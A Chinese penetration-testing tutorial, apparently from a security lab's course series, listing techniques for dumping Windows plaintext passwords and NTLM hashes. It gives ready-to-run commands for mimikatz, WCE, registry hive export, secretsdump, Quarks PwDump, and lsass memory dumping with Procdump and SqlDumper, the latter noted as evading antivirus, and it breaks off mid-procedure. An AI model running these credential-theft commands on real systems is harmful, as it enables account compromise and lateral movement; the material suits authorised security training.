教你多姿势抓取Windows明文或Hash,快收藏!

教你多姿势抓取Windows明文或Hash，快收藏！

渗透测试，可用于测试企业单位内网的安全性，而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环，一旦某台机器的密码在内网中是通用的，那么该内网的安全性将会非常糟糕。

本期安仔课堂，ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。

一、mimikatz

mimikatz是一款轻量级的调试神器，功能非常强大，其中最常用的功能就是抓取明文或Hash。

用法：

mimikatz.exe"privilege::debug""sekurlsa::logonpasswords full""exit"

图1

另外，需要注意的是，当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，如下图，密码字段显示为null，此时可以通过修改注册表的方式抓取明文，但需要用户重新登录后才能成功抓取。

图2

修改注册表命令：

图3

修改成功后，等用户下次再登录的时候，重新运行mimikatz，即可抓到明文密码，如需恢复原样，只需将上图REG_DWORD的值1改为0即可。

图4

二、Getpass

Getapss是由闪电小子根据mimikatz编译的一个工具，可以直接获取明文密码，直接运行Getpass.exe即可。

图5

三、Wce

Wce是一款Hash注入神器，不仅可以用于Hash注入，也可以直接获取明文或Hash。

抓明文：wce.exe-w

图6

抓Hash：wce.exe-l

图7

四、Powershell

当目标系统存在powershell时，可直接一句powershell代码调用抓取，前提是目标可出外网，否则需要将ps1脚本放置内网之中。

抓明文:

图8

图9抓Hash:

图10

图11

五、Sam

1.使用注册表来离线导出Hash

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save hklm\security security.hiv

导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。

图12

或者导入sam.hiv和system.hiv的syskey获取密码Hash。

图13

除了cain，也可以使用mimikatz加载sam.hiv和sam.hiv来导出Hash。

用法：mimikatz.exe"lsadump::sam/system:system.hiv/sam:sam.hiv"exit

图14

或者使用impacket套件中的secretsdump.py脚本去解密，也是可以的。用法：python secretsdump.py-sam sam.hiv-security security.hiv-system system.hiv LOCAL

图15

2.使用mimikatz在线导出sam的Hash

用法：mimikatz.exe"log res.txt""privilege::debug""token::elevate" "lsadump::sam""exit"

图16

六、PwDump7

Pwdump7可以在CMD下直接提取系统中用户的密码Hash，直接运行即可。

图17

七、Quarks PwDump

Quarks PwDump是一款开放源代码的Windows用户凭据提取工具，它可以抓取Windows平台下多种类型的用户凭据，包括：本地帐户、域帐户、缓存的域帐户和Bitlocker。

用法：

导出本地用户Hash：

Quarks PwDump.exe--dump-hash-local

图18

配合Ntdsutil导出域用户Hash：

QuarksPwDump–dump-hash-domain–ntds-file c:\ntds_save.dit

图19

八、Procdump+mimikatz Procdump是微软出品的一个小工具，具备一定的免杀功能。用法：

1.生成dump文件

Procdump.exe-accepteula-ma lsass.exe lsass.dmp

图20

2.mimikatz加载dump文件

mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonPasswords full""exit"

图21

九、SqlDumper+mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的，功能和Procdump 相似，并且也是微软出品的，体积远小于Procdump，也具备一定的免杀功能。

SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL

Server\number\Shared，number代表SQL Server的版本，参考如下：140for SQL Server2017

130for SQL Server2016

120for SQL Server2014

110for SQL Server2012

100for SQL Server2008

90for SQL Server2005

如果目标机器没有安装SQL Server，可以自己上传一个SqlDumper.exe。用法：

1.查看lsass.exe的ProcessID

tasklist/svc|findstr lsass.exe

图22

2.导出dump文件